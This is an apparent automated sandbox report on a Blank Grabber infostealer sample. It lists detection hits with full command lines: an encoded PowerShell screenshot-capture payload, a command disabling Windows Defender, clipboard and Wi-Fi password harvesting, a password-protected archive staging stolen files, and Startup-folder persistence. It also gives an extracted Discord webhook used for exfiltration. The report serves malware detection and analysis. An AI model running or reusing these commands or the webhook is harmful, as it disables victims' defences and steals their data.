AIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 1320, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7596, TargetFilename: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, ProcessId: 7036, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 8072, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 2624, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: sppawx.exe.7860.2.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}

Multi AV Scanner detection for submitted file

Source: sppawx.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256C901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

103_2_00007FF6256C901C

Source: sppawx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: sppawx.exe, 00000002.00000002.1756530183.00007FFEED7A1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdbhP source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sppawx.exe, 00000002.00000002.1750819292.00007FFEDCBDF000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdb source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sppawx.exe, 00000002.00000002.1756039277.00007FFEEAFC1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sppawx.exe, 00000002.00000002.1755706204.00007FFEE6F27000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: sppawx.exe, sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sppawx.exe, 00000002.00000002.1756304635.00007FFEECEC1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: \vp.pdb* source: powershell.exe, 00000044.00000002.1603530749.000001AF5481E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sppawx.exe, 00000002.00000002.1755203682.00007FFEDE6A1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752661603.00007FFEDD411000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000000.1619209555.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF79A3183B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3192F0 FindFirstFileExW,FindClose,	0_2_00007FF79A3192F0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF79A3318E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3192F0 FindFirstFileExW,FindClose,	2_2_00007FF79A3192F0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF79A3183B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF79A3318E4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF6256D46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257188E0 FindFirstFileExA,	103_2_00007FF6257188E0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF6256CE21C

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp

String found in memory: ifdapp1xmpexifunknownsubinteropgpsapp0app13iptcirb8bimiptc8bimResInfo8bimiptcdigestthumbtEXtxmpstructxmpbagxmpseqxmpaltlogscrdescimgdescgrctlextappextcommentextcomchrominanceluminancegAMAbKGDiTXtcHRMhISTiCCPsRGBtIMEddsInfoheifPropsheifHDRANIMANMFbmppngicocurjpgtiffgifwmphotoddsadngheifwebprdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/stDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmp